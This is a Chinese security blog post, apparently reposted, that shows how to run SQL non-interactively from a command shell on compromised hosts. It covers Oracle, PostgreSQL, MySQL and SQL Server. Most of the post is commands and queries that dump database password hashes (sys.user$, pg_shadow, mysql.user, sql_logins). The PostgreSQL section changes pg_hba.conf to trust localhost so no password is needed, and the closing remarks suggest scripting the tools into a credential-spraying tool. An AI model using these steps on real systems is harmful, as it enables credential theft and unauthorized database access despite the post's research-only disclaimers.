各主流数据库非交互执行

admin
admin
admin
138635
文章
114
评论
2020年8月21日14:59:50评论229 views字数 2076阅读6分55秒阅读模式

各主流数据库非交互执行

声明:
    文章初衷仅为攻防研究学习交流之用,严禁利用相关技术去从事一切未经合法授权的入侵攻击破坏活动,因此所产生的一切不良后果与本文作者及该公众号无任何关联

    另外,这只是一个个人性质的公众号(非任何商业营销号),目的也仅为技术分享交流,并不想去招惹任何是非,故,除了此公众号,将不再考虑做其他的任何推广 ( 细心的你可能也发现了,至今为止,甚至连一则外部广告都不曾出现过 ),再次声明,严禁所有未经本人明确授权的恶意转载 及 非法营销牟利行为

实战场景说明:

    实战中,可能经常会遇到类似这样的问题,比如,内网机脱网,无法进行各种正反向代理转发(或者速度极慢,根本连不上),导致Navicat,SSMS,PLSQL...等各种三方数据库客户端根本无使用条件,再比如,无rdp操作条件,有一个cmdshell / bash, 但最终目的也只是想在库中快速进行一些账号密码搜集或者脱取库表结构类的简单操作,等等诸如此类吧...


    此时,就需要了解关于各主流数据库在cmd/bash下的一些非交付sql执行方式,非常简单,没任何技术含量,只为笔记留存,方便其它弟兄们,注,如下的所有工具均为各自数据库内置工具,不依赖任何第三方外部工具( 即使数据库没装亦把对应的命令行客户端拆出来独立使用 ),很灵活


0x01 Oracle

安装用户权限下,无密码非交互执行

tv.sql 语句select * from v$version;SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';SELECT name,spare4 FROM sys.user$;exit;
默认在装好oracle以后,sqlplus会被自动写到当前用户的环境下,直接执行即可# echo SELECT name,spare4 FROM sys.user$; | sqlplus "/ as sysdba"# sqlplus "/ as sysdba" @c:tv.sql > c:Userspublicsimlog.logs

各主流数据库非交互执行


0x02 Postgresql

    服务安装用户权限下,无密码非交互执行修改目标服务配置文件(pg_hba.conf),对127.0.0.1进行trust,之后再想办法覆盖目标原有配置文件[Win下比较特殊,无需重启服务,即时生效]

tv.sql语句select version();SELECT usename FROM pg_user WHERE usesuper IS TRUE;SELECT usename, passwd FROM pg_shadow;
PgSQL在装好之后,默认并没有把PSQL没写到当前用户环境变量下,故需要自行指定绝对路径执行# echo SELECT usename, passwd FROM pg_shadow; | C:SRVPgSQL9.4.24binpsql  -h 127.0.0.1 -p 5432 -U postgres# C:SRVPgSQL9.4.24binpsql  -h 127.0.0.1 -p 5432 -U postgres < c:tv.sql

各主流数据库非交互执行

各主流数据库非交互执行


0x03 Mysql 带账密非交互执行

tv.sql 语句select @@version;select user,host,password from mysql.user;
一般情况下,在安装Mysql时都会顺手把环境变量选项勾上,故直接执行即可,如遇未添加环境变量,找到目标mysql安装目录下的bin目录指定绝对路径执行即可# mysql -uroot -p"abc123" -D Mysql <c:tv.sql# mysql -uroot -p"abc123" -D Mysql -e "select user,host,password from mysql.userG;select version()G;";

各主流数据库非交互执行


0x04 SqlServer 带账密非交互执行

tv.sql 语句select @@version;SELECT name, password_hash FROM master.sys.sql_logins;
Mssql安装完后,默认都会把sqlcmd添加到当前用户环境变量下,故直接执行即可# sqlcmd -U sa -P pwd123 -S 192.168.159.131 -d master -i "C:tv.sql"sqlcmd -U sa -P pwd123 -S 192.168.159.131 -d master -Q " SELECT namepassword_hash FROM master.sys.sql_logins;"

各主流数据库非交互执行


小结:

    非常简单,不再赘述,其实有些工具稍微灵活配合bat/sh,转身一变就是个服务喷射工具,非常适用于某些特殊场景下,还是那初衷,一篇文章只解决一个小问题,不想掺杂太多废话,祝好运各主流数据库非交互执行


    如果觉得确实还不错,也欢迎积极转发留言,以便让更多真正需要的人都能看到,如遇到文中错误,也欢迎随时私信指正,非常感谢 各主流数据库非交互执行



    另外,也非常期待能和更多真正志同道合弟兄一起深入交流学习,( 还是那句话,维护不易,乱七八糟的人就不要来了,非常感谢 )

各主流数据库非交互执行


免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年8月21日14:59:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   各主流数据库非交互执行https://cn-sec.com/archives/97276.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息